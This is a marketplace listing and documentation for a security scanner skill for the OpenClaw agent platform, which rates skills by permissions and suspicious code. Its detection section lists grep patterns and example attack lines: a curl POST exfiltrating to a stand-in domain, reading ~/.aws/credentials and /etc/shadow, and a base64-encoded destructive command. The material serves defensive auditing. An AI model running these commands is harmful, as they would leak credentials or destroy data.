# Send Skill Security Scanner to your agent Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually. ## Fast path - Download the package from Yavira. - Extract it into a folder your agent can access. - Paste one of the prompts below and point your agent at the extracted folder. ## Suggested prompts ### New install ```text I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete. ``` ### Upgrade existing ```text I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run. ``` ## Machine-readable fields ```json { "schemaVersion": "1.0", "item": { "slug": "skill-security-scanner", "name": "Skill Security Scanner", "source": "tencent", "type": "skill", "category": "ćź‰ć…šćˆè§„", "sourceUrl": "https://clawhub.ai/Steffano198/skill-security-scanner", "canonicalUrl": "https://clawhub.ai/Steffano198/skill-security-scanner", "targetPlatform": "OpenClaw" }, "install": { "downloadUrl": "/downloads/skill-security-scanner", "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-security-scanner", "sourcePlatform": "tencent", "targetPlatform": "OpenClaw", "packageFormat": "ZIP package", "primaryDoc": "SKILL.md", "includedAssets": [ "README.md", "SKILL.md", "examples/scan-output.md", "scripts/scan-skill.sh" ], "downloadMode": "redirect", "sourceHealth": { "source": "tencent", "slug": "skill-security-scanner", "status": "healthy", "reason": "direct_download_ok", "recommendedAction": "download", "checkedAt": "2026-04-29T15:34:26.427Z", "expiresAt": "2026-05-06T15:34:26.427Z", "httpStatus": 200, "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-security-scanner", "contentType": "application/zip", "probeMethod": "head", "details": { "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=skill-security-scanner", "contentDisposition": "attachment; filename=\"skill-security-scanner-1.0.1.zip\"", "redirectLocation": null, "bodySnippet": null, "slug": "skill-security-scanner" }, "scope": "item", "summary": "Item download looks usable.", "detail": "Yavira can redirect you to the upstream package for this item.", "primaryActionLabel": "Download for OpenClaw", "primaryActionHref": "/downloads/skill-security-scanner" }, "validation": { "installChecklist": [ "Use the Yavira download entry.", "Review SKILL.md after the package is downloaded.", "Confirm the extracted package contains the expected setup assets." ], "postInstallChecks": [ "Confirm the extracted package includes the expected docs or setup files.", "Validate the skill or prompts are available in your target agent workspace.", "Capture any manual follow-up steps the agent could not complete." ] } }, "links": { "detailUrl": "https://openagent3.xyz/skills/skill-security-scanner", "downloadUrl": "https://openagent3.xyz/downloads/skill-security-scanner", "agentUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent", "manifestUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.json", "briefUrl": "https://openagent3.xyz/skills/skill-security-scanner/agent.md" } } ``` ## Documentation ### Skill Security Scanner Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust. ### When to Use Before installing a new skill from ClawHub Auditing existing installed skills User asks "is this skill safe?" After ClawHavoc type incidents (malicious skills in ecosystem) Before running untrusted skills ### Quick Reference CommandPurposescan-skill Scan a single skillscan-allScan all skills in workspacetrust-score Get quick trust score (0-100)list-permissions List all requested permissions ### 1. Check Metadata (Frontmatter) Look for: bins - CLI tools skill needs env - Environment variables (API keys, tokens) requires.config - Required config settings requires.bins - Binary dependencies Red flags: Skills requesting many bins without clear purpose Env vars for sensitive services (AWS keys, database passwords) Config requiring admin/elevated permissions ### 2. Analyze SKILL.md Content Suspicious patterns to detect: # Network calls to unknown domains grep -E "(curl|wget|http|https).*\\.com" SKILL.md grep -E "fetch\\(|axios\\(" SKILL.md # File system access beyond declared scope grep -E "rm -rf|dd |mkfs" SKILL.md # Credential access grep -E "password|secret|token|key" SKILL.md # Execution of downloaded code grep -E "eval\\(|exec\\(|system\\(" SKILL.md # Base64 encoded commands grep -E "base64|-enc|-encode" SKILL.md ### 3. Trust Score Calculation Score from 0-100 based on: FactorWeightCriteriaAuthor reputation20%Known author? Official OpenClaw skill?Permission scope30%Minimal bins/envs?Code patterns25%No suspicious commandsUpdate frequency15%Recently updated?Download count10%Popular = more scrutiny ### 4. Risk Levels ScoreRiskAction80-100🟱 LowSafe to use60-79🟡 MediumReview before use40-59🟠 HighUse with caution0-39🔮 CriticalDon't use ### Scan Result 🔍 Skill: ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 📊 Trust Score: /100 () 📋 Permissions Requested: ‱ bins: curl, jq ‱ env: OPENWEATHER_API_KEY ⚠ Issues Found: 1. [MEDIUM] Requests network access but no clear purpose 2. [LOW] No recent updates (6+ months) ✅ Positive Signs: ‱ Official OpenClaw skill ‱ Clear documentation ### Trust Report Generate a full report: ## Security Analysis: ### Score: /100 () ### Permissions Analysis | Type | Requested | Risk | |------|-----------|------| | bins | curl, jq | Low | | env | API_KEY | Medium | ### Code Pattern Analysis - ✅ No suspicious execution patterns - ✅ No credential access attempts - ⚠ 2 network calls to external domains ### Recommendation ### High Risk Patterns Network exfiltration # Example: sending data to unknown servers # curl -X POST https://SUSPICIOUS-DOMAIN/exfil # fetch("https://data-collector.DOMAIN") Credential harvesting # Example: reading credentials # cat ~/.aws/credentials # grep "password" /etc/shadow Persistence mechanisms # Example: auto-start, cron, systemd # sudo crontab -l # systemctl enable Obfuscated code # Example: base64 encoded commands echo "c3VkbyByb20gL3J0ZiAv" | base64 -d ### Medium Risk Patterns Excessive permissions - More bins/envs than needed No documentation - Unclear what skill does Outdated - No updates in 6+ months Third-party dependencies - Unknown npm/go packages ### Green Flags ✅ Official OpenClaw skills (openclaw/skills) ✅ Clear, specific permissions ✅ Active maintenance (recent commits) ✅ Open source with clear code ✅ Known author with reputation ### Before Installing New Skill # 1. Get skill path (ClawHub or local) # 2. Run full scan scan-skill /path/to/skill # 3. Check trust score trust-score /path/to/skill # 4. Review issues # 5. Decide: install / skip / investigate more ### Regular Security Audit # Weekly: scan all installed skills scan-all # Monthly: generate full report # Save to .learnings/ for documentation ### Quick Trust Check # For quick decision trust-score # If score < 60, do full scan # If score < 40, don't use ### Integration with Other Skills Works with self-improving-agent - Log security findings Use memory - Remember trust scores for known skills Report findings to user before risky operations ### Best Practices Always scan before installing untrusted skills Document scan results in .learnings/ Share findings with community (anonymized) Update trust scores when vulnerabilities found Trust but verify - Don't rely solely on automated scanning ### Example 1: Scanning Before Install User wants to install "cool-new-skill" from ClawHub: > scan-skill ./skills/cool-new-skill 🔍 Scanning: cool-new-skill ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 📊 Trust Score: 72/100 (🟡 Medium) 📋 Permissions: ‱ bins: none ‱ env: none ⚠ Issues: ‱ No recent updates (8 months) ‱ Unknown author ✅ Positives: ‱ Clear documentation ‱ Minimal permissions 💡 Recommendation: Safe to try, monitor usage ### Example 2: Finding Malware > scan-skill ./skills/suspicious-skill 🔍 Scanning: suspicious-skill ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 📊 Trust Score: 23/100 (🔮 CRITICAL) 📋 Permissions: ‱ bins: curl, base64 ‱ env: API_KEY, SECRET_TOKEN 🚹 CRITICAL ISSUES FOUND: 1. Network exfiltration pattern detected 2. Credential access attempt 3. Obfuscated commands (base64) 💀 Recommendation: DO NOT USE - Potential malware ### Example 3: Audit Report > scan-all 📋 Scanning all skills in ~/.openclaw/workspace/skills/ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ✅ github: 95/100 (safe) ⚠ todoist: 68/100 (review needed) ✅ self-improving-agent: 92/100 (safe) 🔮 unknown-skill: 34/100 (remove recommended) ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ Summary: 2 safe, 1 review, 1 remove ### Related ClawHavoc incident (Feb 2026) - 341 malicious skills Agent Trust Hub - Third-party security tooling OpenClaw Security docs: docs.openclaw.ai/gateway/security ## Trust - Source: tencent - Verification: Indexed source record - Publisher: Steffano198 - Version: 1.0.1 ## Source health - Status: healthy - Item download looks usable. - Yavira can redirect you to the upstream package for this item. - Health scope: item - Reason: direct_download_ok - Checked at: 2026-04-29T15:34:26.427Z - Expires at: 2026-05-06T15:34:26.427Z - Recommended action: Download for OpenClaw ## Links - [Detail page](https://openagent3.xyz/skills/skill-security-scanner) - [Send to Agent page](https://openagent3.xyz/skills/skill-security-scanner/agent) - [JSON manifest](https://openagent3.xyz/skills/skill-security-scanner/agent.json) - [Markdown brief](https://openagent3.xyz/skills/skill-security-scanner/agent.md) - [Download page](https://openagent3.xyz/downloads/skill-security-scanner)